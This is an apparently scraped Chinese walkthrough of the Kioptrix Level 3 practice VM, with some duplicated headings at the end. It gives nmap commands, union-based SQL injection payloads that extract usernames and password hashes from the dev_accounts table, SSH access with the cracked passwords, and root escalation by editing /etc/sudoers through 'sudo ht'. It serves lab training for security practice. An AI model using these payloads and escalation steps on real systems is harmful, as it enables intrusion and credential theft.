Kioptrix Level 3 靶机渗透测试与提权指南<\/h1>

一、靶机环境搭建<\/h2>

下载Kioptrix Level 3靶机镜像<\/li>
在虚拟化平台(如VMware\/VirtualBox)中导入靶机<\/li>

确保靶机与攻击机(Kali Linux)在同一网络段<\/li> <\/ol>

二、信息收集阶段<\/h2>

1. 网络扫描<\/h3>

nmap -sn 192.168.108.0\/24
<\/span><\/span><\/code><\/pre>
确定靶机IP地址(本例中为192.168.108.137)<\/li>
排除已知IP(如Kali Linux的192.168.108.130)<\/li>
<\/ul>
2. 端口与服务扫描<\/h3>
nmap -p 1-65535 192.168.108.137
<\/span><\/span>nmap -sV 192.168.108.137
<\/span><\/span><\/code><\/pre>扫描结果：<\/p>

OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)<\/li>
Apache httpd 2.2.8 ((Ubuntu) PHP\/5.2.4-2ubuntu5.6 with Suhosin-Patch)<\/li>
<\/ul>
3. 详细指纹识别<\/h3>
nmap 192.168.108.137 -p 22,80 -sV -sC -O --version-all
<\/span><\/span><\/code><\/pre>操作系统信息：<\/p>

OS CPE: cpe:\/o:linux:linux_kernel:2.6<\/li>
OS details: Linux 2.6.9 - 2.6.33<\/li>
<\/ul>
三、Web应用渗透<\/h2>
1. 访问Web服务<\/h3>

发现登录框，尝试弱口令无果<\/li>
发现某些页面无法正常访问，可能是DNS解析问题<\/li>
<\/ul>
2. 配置DNS解析<\/h3>
Linux环境：<\/strong><\/p>
sudo vim \/etc\/hosts
<\/span><\/span><\/code><\/pre>添加：<\/p>
192.168.108.137 kioptrix3.com
<\/code><\/pre>
Windows环境：<\/strong><\/p>

清除浏览器缓存<\/li>
编辑C:\Windows\System32\drivers\etc\hosts文件<\/li>
添加相同条目<\/li>
<\/ol>
3. 发现SQL注入漏洞<\/h3>

发现URL中存在id参数<\/li>
测试注入点：
id=2
id=1'
<\/code><\/pre>
发现报错，确认存在SQL注入漏洞<\/li>
<\/ul>
4. 利用SQL注入获取数据库信息<\/h3>
爆列数：<\/strong><\/p>
?id=1 order by 7--
<\/code><\/pre>
爆行数：<\/strong><\/p>
?id=2 union select 1,2,3,4,5,6--
<\/code><\/pre>
爆数据库名：<\/strong><\/p>
?id=2 union select 1,database(),3,4,5,6--
<\/code><\/pre>
结果：gallery<\/p>
爆表名：<\/strong><\/p>
?id=2 union select 1,group_concat(table_name),3,4,5,6 from information_schema.columns where table_schema=database()--
<\/code><\/pre>
爆列名：<\/strong><\/p>
?id=2 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database() and table_name='dev_accounts'--
<\/code><\/pre>
获取用户凭证：<\/strong><\/p>
?id=2 union select 1,group_concat(username),group_concat(password),4,5,6 from dev_accounts--
<\/code><\/pre>
结果：<\/p>

用户名：dreg, loneferret<\/li>
MD5哈希密码：0d3eccfb887aabd50f243b3f155c0f8, 5badcaf789d3d1d09794d8f021f40f0e<\/li>
破解后明文密码：Mast3r, starwars<\/li>
<\/ul>
四、系统访问<\/h2>
1. SSH登录<\/h3>
由于OpenSSH版本较旧，需要使用特定算法：<\/p>
ssh -o HostKeyAlgorithms=<\/span>+ssh-rsa loneferret@192.168.108.137
<\/span><\/span><\/code><\/pre>密码：starwars<\/p>
2. 检查系统文件<\/h3>
发现重要文件：<\/p>

checksec.sh<\/li>
CompanyPolicy.README<\/li>
<\/ul>
五、权限提升<\/h2>
1. 使用sudo ht提权<\/h3>

执行：<\/li>
<\/ol>
sudo ht
<\/span><\/span><\/code><\/pre>
如果遇到环境变量问题：<\/li>
<\/ol>
export TERM=<\/span>xterm
<\/span><\/span><\/code><\/pre>

在ht编辑器界面：<\/p>

按F3搜索<\/li>
输入\/etc\/sudoers<\/li>
添加loneferret ALL=(ALL) \/bin\/bash<\/code><\/li>
按F10保存退出<\/li>
<\/ul>
<\/li>

执行：<\/p>
<\/li>
<\/ol>
sudo \/bin\/bash
<\/span><\/span><\/code><\/pre>成功获取root权限<\/p>
六、关键要点总结<\/h2>

信息收集<\/strong>：全面的nmap扫描是渗透测试的基础<\/li>
Web渗透<\/strong>：

注意URL参数可能存在的注入点<\/li>
系统性的SQL注入测试方法<\/li>
<\/ul>
<\/li>
凭证破解<\/strong>：MD5哈希可通过在线工具或字典破解<\/li>
SSH连接<\/strong>：旧版本可能需要特殊参数<\/li>
权限提升<\/strong>：

检查sudo权限<\/li>
利用文本编辑器提权是常见方法<\/li>
注意环境变量设置<\/li>
<\/ul>
<\/li>
<\/ol>
七、防御建议<\/h2>

及时更新系统和软件版本<\/li>
对用户输入进行严格过滤，防止SQL注入<\/li>
使用强密码策略，避免使用弱密码<\/li>
限制sudo权限，避免普通用户通过编辑器获取root权限<\/li>
定期检查系统配置文件和权限设置<\/li>
<\/ol>
八、注意事项<\/h2>

实际渗透测试中必须获得授权<\/li>
OSCP考试中不允许使用外部工具(如GPT)<\/li>
所有技术仅用于合法授权的安全测试和学习目的<\/li>
<\/ol>

Kioptrix Level 3 靶机渗透测试与提权指南<\/h1>

二、信息收集阶段<\/h2>

三、Web应用渗透<\/h2>

四、系统访问<\/h2>

五、权限提升<\/h2>

八、注意事项<\/h2> 实际渗透测试中必须获得授权<\/li> OSCP考试中不允许使用外部工具(如GPT)<\/li> 所有技术仅用于合法授权的安全测试和学习目的<\/li> <\/ol>

八、注意事项<\/h2>

实际渗透测试中必须获得授权<\/li>
OSCP考试中不允许使用外部工具(如GPT)<\/li>
所有技术仅用于合法授权的安全测试和学习目的<\/li> <\/ol>